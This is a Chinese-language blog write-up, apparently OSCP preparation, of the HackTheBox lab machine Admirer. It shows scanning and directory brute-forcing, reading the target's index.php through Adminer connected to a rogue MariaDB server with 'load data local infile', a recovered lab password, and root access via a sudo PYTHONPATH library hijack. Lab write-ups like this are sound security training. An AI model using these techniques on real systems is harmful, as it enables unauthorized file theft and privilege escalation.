OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

Ethan医生2个月前靶场84

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.128.76 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.128.76 (扫描UDP)

image.png


gobuster dir -u http://10.129.128.76/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png

http://10.129.128.76//robots.txt


image.png

直接爆破下面路径

gobuster dir -u http://10.129.128.76/admin-dir/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html -t 50

image.png

gobuster dir -u http://10.129.128.76/admin-dir/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html -t 50

image.png

http://10.129.128.76/admin-dir//contacts.txt

image.png

http://10.129.128.76/admin-dir/credentials.txt

image.png

连接FTP

image.png

都下载下来开始搜索有啥可用信息

image.png

image.png

gobuster dir -u http://10.129.128.76/utility-scripts/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html -t 50

image.png

http://10.129.128.76/utility-scripts//adminer.php

image.png

需要获取到数据库上的password,才能的到真实的waldo密码,


image.png

image.png

CREATE DATABASE admirer;

CREATE USER 'demo'@'%' IDENTIFIED BY 'demo_admirer';

GRANT ALL PRIVILEGES ON * . * TO 'demo'@'%';

FLUSH PRIVILEGES;

create table lez(data VARCHAR(255));

然后打开远程访问

vim /etc/mysql/mariadb.conf.d/50-server.cnf

systemctl restart mysql

image.png

改成0.0.0.0,然后在使用远程的机器进行访问

image.png

然就可以查看index.php

load data local infile '../index.php'

    into table admirer.lez

    fields terminated by '/n'

image.png

image.png


waldo, &<h5b~yK3F#{PaPB&dA}{H>

image.png


image.png

image.png

image.png

利用这py挡案

image.png


sudo PYTHONPATH=/tmp /opt/scripts/admin_tasks.sh 6

根据上面显示可以得出是加载模块shutil里面的函数make_archive 那么就可以利用此处新建一个shutil的python脚本文件然后加载函数make_archive再执行命令进行提权

相关python 库劫持可以参考:https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

image.png

image.png



3f851577a28a525b42596474270c7698

标签: OSCP

相关文章

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.73.179 (扫描TCP)nmap -sU --top-ports 100 10.129.73....

OSCP备考_0x02_HackThBox靶机_Linux_bashed

OSCP备考_0x02_HackThBox靶机_Linux_bashed

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

OSCP备考_0x02_Vulnhub靶机_KIOPTRIX:LEVEL1.1(#2)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-11-2,23/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)nmap -sU --top-ports 100 10.129.25...

OSCP备考_0x34_HackThBox靶机_time

OSCP备考_0x34_HackThBox靶机_time

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.107.34 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x56_HackThBox靶机_Windows_worker

OSCP备考_0x56_HackThBox靶机_Windows_worker

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.29 (扫描TCP)svn list svn://10.129.2.29svn lo...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。